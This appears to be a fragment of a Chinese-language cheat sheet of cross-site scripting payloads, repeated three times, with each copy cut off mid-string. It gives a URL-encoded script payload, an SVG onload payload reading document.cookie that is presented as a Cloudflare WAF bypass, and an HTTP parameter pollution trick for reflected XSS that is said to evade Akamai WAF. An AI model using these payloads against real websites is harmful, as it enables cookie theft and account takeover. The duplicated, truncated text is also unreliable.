alert%28(%60xss%60)%29<%2Fscript> 参考:https://brutelogic.com.br/blog/building-xss-polyglots/ 2.绕过CloudFlare waf Payload <svg onload=alert(document.cookie)> 3.HTTP参数污染 绕过Akamai WAF ASP样式HTTP参数污染反射XSS(仅限 Chrome) ?id=1&id=2 --> ?id="&id=onpointerrawupdate="a=co...
alert%28(%60xss%60)%29<%2Fscript> 参考:https://brutelogic.com.br/blog/building-xss-polyglots/ 2.绕过CloudFlare waf Payload <svg onload=alert(document.cookie)> 3.HTTP参数污染 绕过Akamai WAF ASP样式HTTP参数污染反射XSS(仅限 Chrome) ?id=1&id=2 --> ?id="&id=onpointerrawupdate="a=co...
alert%28(%60xss%60)%29<%2Fscript> 参考:https://brutelogic.com.br/blog/building-xss-polyglots/ 2.绕过CloudFlare waf Payload <svg onload=alert(document.cookie)> 3.HTTP参数污染 绕过Akamai WAF ASP样式HTTP参数污染反射XSS(仅限 Chrome) ?id=1&id=2 --> ?id="&id=onpointerrawupdate="a=co...